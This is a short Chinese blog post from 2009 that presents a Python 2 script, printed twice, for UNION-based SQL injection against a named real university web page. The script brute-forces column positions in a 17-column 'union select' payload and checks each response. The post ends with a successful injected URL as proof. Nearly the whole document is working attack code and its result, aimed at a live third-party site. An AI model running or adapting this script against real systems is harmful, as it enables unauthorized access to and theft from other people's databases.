有python脚本为证:
- import urllib2
- import urlparse
- import httplib
- from time import sleep
- url = "http://sw.scu.edu.cn/new_sw/infoDetail.jsp?id=650 and 1=2 "
- error = ">500 - Page Error</"
-
- ok = False
- total = 0
-
- length = 17
-
- list = ['1','1','1','1','1', '1','1','1','1','1', '1','1','1','1','1', '1' ,'1']
-
- li = []
-
- def main():
-
- ''
-
-
-
- for i in range(1, length + 1):
- fun(i)
-
- print total
-
- def fun(i):
- li = []
- for j in range(0,i):
- li.append(1)
-
- recursion(li,1)
-
-
- def execute(num):
- dateList = []
- for i in range(1,num +1):
- dateList.append(i)
-
-
- place(dateList)
- print dateList
-
- def place(dateList):
- num = dateList.__len__()
-
- for i in range(1, num +1 ):
- move = dateList[num - i]
-
-
- def recursion(li, p):
- len = li.__len__()
- if p > len:
-
- proof(li)
- return
- if ok == True:
- return
-
- for i in range(li[p -1 ], length -len + p +1 ):
- li[p-1] = i
-
- for j in range(p, len):
- li[j] = li[j-1] + 1;
-
- if ok == True:
- return
- recursion(li, p+1)
-
-
- def proof(li):
-
- len = li.__len__()
- for i in range(0, len):
- list[li[i] - 1] = 'now()'
-
- try_assembly(list)
- clean()
-
- def try_assembly(list):
-
- global total
- global url
- total = total + 1
- sql = " union select "
-
- for i in range(0, length):
-
- sql = sql + "'" + list[i] +"',";
-
- sql = sql +'--'
- sql = sql.replace(",--", " -- ")
- sql = sql.replace("'now()'","now()")
-
- u = url + sql
- print sql
- parser(u)
-
- def clean():
- global list
- list = []
- for i in range(0, length):
- list.append('1')
-
- def parser(path):
- global ok
- print path
- conn = urllib2.urlopen(path.replace(" ", "%20"))
-
- data = conn.read()
-
- if data.split('title')[1] == error:
-
- return False
- else:
- ok = True
- print 'ok'+ path
- return True
-
- if __name__ == '__main__':
- main()
import urllib2
import urlparse
import httplib
from time import sleep
url = "http://sw.scu.edu.cn/new_sw/infoDetail.jsp?id=650 and 1=2 "
error = ">500 - Page Error</"
ok = False
total = 0
length = 17
list = ['1','1','1','1','1', '1','1','1','1','1', '1','1','1','1','1', '1' ,'1']
li = []
def main():
'''proxy_support = urllib2.ProxyHandler({"http":"http://localhost:8000"})
opener = urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
'''
for i in range(1, length + 1):
fun(i)
print total
def fun(i):
li = []
for j in range(0,i):
li.append(1)
recursion(li,1)
def execute(num):
dateList = []
for i in range(1,num +1):
dateList.append(i)
place(dateList)
print dateList
def place(dateList):
num = dateList.__len__()
for i in range(1, num +1 ):
move = dateList[num - i]
def recursion(li, p):
len = li.__len__()
if p > len:
proof(li)
return
if ok == True:
return
for i in range(li[p -1 ], length -len + p +1 ):
li[p-1] = i
for j in range(p, len):
li[j] = li[j-1] + 1;
if ok == True:
return
recursion(li, p+1)
def proof(li):
len = li.__len__()
for i in range(0, len):
list[li[i] - 1] = 'now()'
try_assembly(list)
clean()
def try_assembly(list):
global total
global url
total = total + 1
sql = " union select "
for i in range(0, length):
sql = sql + "'" + list[i] +"',";
sql = sql +'--'
sql = sql.replace(",--", " -- ")
sql = sql.replace("'now()'","now()")
u = url + sql
print sql
parser(u)
def clean():
global list
list = []
for i in range(0, length):
list.append('1')
def parser(path):
global ok
print path
conn = urllib2.urlopen(path.replace(" ", "%20"))
data = conn.read()
if data.split('title')[1] == error:
return False
else:
ok = True
print 'ok'+ path
return True
if __name__ == '__main__':
main()
有结果为证:
http://sw.scu.edu.cn/new_sw/infoDetail.jsp?id=650 and 1=2 union
select
'1','1','1','title',now(),'conten','key','1','1','1','1','1','1','1','1','1','1'
--
posted on 2009-04-29 17:47
小丑鱼 阅读(66)
评论(0) 编辑 收藏